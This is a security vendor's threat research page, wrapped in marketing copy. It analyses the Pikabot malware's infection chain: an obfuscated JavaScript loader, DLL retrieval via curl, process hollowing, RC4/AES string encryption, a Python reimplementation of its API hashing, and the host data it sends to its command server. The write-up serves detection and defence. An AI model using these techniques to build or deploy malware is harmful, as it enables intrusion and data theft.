Combine cutting-edge XDR technology, multi-signal threat intelligence and 24/7 Elite Threat Hunters to help you build a world-class security operation.
Our team delivers the fastest response time in the industry. Threat suppression within just 4 hours of being engaged.
Cyber risk and advisory programs that identify security gaps and build security strategies to address them.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
XDR with machine learning that eliminates noise, enables real-time detection and response, and automatically blocks threats.
Seamless integration and threat investigation across your existing tech stack.
Proactive threat intelligence, original threat research and a world-class team of seasoned industry veterans.
Extend your team capabilities and prevent business disruption with expertise from eSentire.
We balance automated blocks with rapid human-led investigations to manage threats.
Guard endpoints by isolating and remediating threats to prevent lateral spread.
Defend brute force attacks, active intrusions and unauthorized scans.
Investigation and threat detection across multi-cloud or hybrid environments.
Remediate misconfigurations, vulnerabilities and policy violations.
Investigate and respond to compromised identities and insider threats.
Stop ransomware before it spreads.
Meet regulatory compliance mandates.
Detect and respond to zero-day exploits.
End misconfigurations and policy violations.
Defend third-party and supply chain risk.
Prevent disruption by outsourcing MDR.
Adopt a risk-based security approach.
Meet insurability requirements with MDR.
Protect your most sensitive data.
Build a proven security program.
Operationalize timely, accurate, and actionable cyber threat intelligence.
THE THREAT In recent weeks, eSentire’s Threat Response Unit (TRU) has traced numerous email account compromise cases to infrastructure hosted on several related hosting…
Dec 10, 2024THE THREATUpdate: Security patches to address this vulnerability were released by Cleo on December 12th. Organizations need to update to Cleo Harmony, VLTrader, and LexiCom versions…
eSentire is The Authority in Managed Detection and Response Services, protecting the critical data and applications of 2000+ organizations in 80+ countries from known and unknown cyber threats. Founded in 2001, the company’s mission is to hunt, investigate and stop cyber threats before they become business disrupting events.
We provide sophisticated cybersecurity solutions for Managed Security Service Providers (MSSPs), Managed Service Providers (MSPs), and Value-Added Resellers (VARs). Find out why you should partner with eSentire, the Authority in Managed Detection and Response, today.
Multi-Signal MDR with 300+ technology integrations to support your existing investments.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
Three MDR package tiers are available based on per-user pricing and level of risk tolerance.
The latest security advisories, blogs, reports, industry publications and webinars published by TRU.
Compare eSentire to other Managed Detection and Response vendors to see how we stack up against the competition.
See why 2000+ organizations globally have chosen eSentire for their MDR Solution.
Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.
We have discovered some of the most dangerous threats and nation state attacks in our space – including the Kaseya MSP breach and the more_eggs malware.
Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit – the TRU team.
In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.
Here’s the latest from our TRU Team…
Since October 2023, our Threat Response Unit (TRU) has observed multiple instances of the Pikabot malware affecting customers within the manufacturing and business services industries.
The initial infection stems from an email containing a link to download a ZIP archive, which in turn, contains an obfuscated JavaScript file responsible for infecting the device when executed by the user.
Upon cleaning up the JS file, we can see it creates directories “Epfijglsorg\\Ijfkmvofguv” under %SYSTEMDRIVE% (2), then attempts to retrieve the malicious .DAT file from URLs (1,2,5) via curl. Upon successful retrieval of the malicious file, it gets renamed to Wiflgodjvo.dll. The malicious DLL file then runs with rundll32.exe and an export name “Enter” (4) in Figure 1.
PikaBot is injected into the SearchProtocolHost.exe process via the process hollowing technique (T1055.012). The core payload of PikaBot contains the inline RC4 encryption for the strings. Upon decrypting the strings, we get base64-encoded strings, as shown in Figure 2.
The inline RC4 encryption in Pikabot is used to obfuscate its strings, making it more difficult for security researchers and automated detection systems to analyze and identify the malware's purpose and behavior.
The RC4-decrypted base64-encoded strings then go through another decryption layer with AES, as shown in Figure 3. The key and IV are encrypted with RC4.
For further analysis on Pikabot, please refer to research published by OALabs here and here.
PikaBot uses API hashing (Figure 4) for only a few API calls; the rest are encrypted using the abovementioned method. The C2 is also encrypted with the same algorithm but uses a different set of an AES key and IV.
Here is the Python implementation of the hashing algorithm used:
def api_hashing(data, length): v2 = 8387 if data and length: for i in range(length): v4 = data[i] & 0xFF v5 = v4 + 32 if not 65 <= v4 <= 90: v5 = v4 v2 = v5 + 5 * v2 return v2 & 0xFFFFFFFF def calculate_and_print_hash(data_string): data_bytes = data_string.encode() hash_result = api_hashing(data_bytes, len(data_bytes)) value = hex(hash_result) print(f"Hash result '{data_string}': {value}") calculate_and_print_hash("LoadLibraryA") calculate_and_print_hash("HeapFree") calculate_and_print_hash("GetProcAddress")
Upon successful infection, PikaBot gathers basic host information and sends it over to C2. The commands run on the host includes:
Example of some of the information gathered by PikaBot with placeholders:
{\"29sogk11\": \"%s\", \"8MYMnroOE\": \"%s\", \"D2eHqm\": \"Win %d.%d %d\", \"Svr0U\": %s, \"YvqsXd96s\": \"%s\", \"Gk03HL\": \"%s\", \"KEIsAH\": \"%s\", \"6oX3zxl\": %d, \"J2pBsnnT\": \"%s\", \"vxcY4IafK\": %d, \"CoV203qs\": \"%s\", \"OLZpE2\": \"%s\", \"9NMqowk9\": \"%s\", \"TnyWDGp46\": \"%s\", \"yrjOT\": \"%s\", \"jcjIbRIYD\": %d, \"XPQG7Z5l\": %d}
For example, D2eHqm holds the Windows version, YvqsXd96s holds the username, Gk03HL holds the system name, KEIsAH holds the processor information, J2pBsnnT holds display adapter information, vxcY4IafK holds the RAM size, CoV203qs holds the screen size, OLZpE2 holds the Pikabot ID (in our case it’s “1.1.19-gen”), 6oX3zxl likely holds the value of the TickCount.
The payload examines the language setting of the infected system, and if it detects that the system is set to Russian or Ukrainian, it refrains from executing any further code (Figure 5).
Pikabot creates the hardcoded mutex value “{C1E8A9B1-57F0-47B0-AB93-C739C6592C5F}” upon successful infection to avoid reinfecting the host.
In one particular customer environment, we observed an unsuccessful attempt of a Pikabot infection via drive-by download. In this instance, the client searched for AnyDesk installer and stumbled across the malicious page anadesky.firstbasedso[.]com (Figure 6), from which they downloaded a malicious MSI installer that was signed by “The New Print Shop LTD”.
Jérôme Segura, the Senior Director of Threat Intelligence at Malwarebytes, also published an article on December 15, 2023, detailing how Pikabot leverages malicious ads for its distribution.
Pivoting with VirusTotal, we found another two domains impersonating Slack and Zoom, as shown in Figures 7-9.
Using eSentire MDR for Endpoint, our team of 24/7 SOC Cyber Analysts isolated the affected host, contained the threat, and notified the customer of suspicious activities.
The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.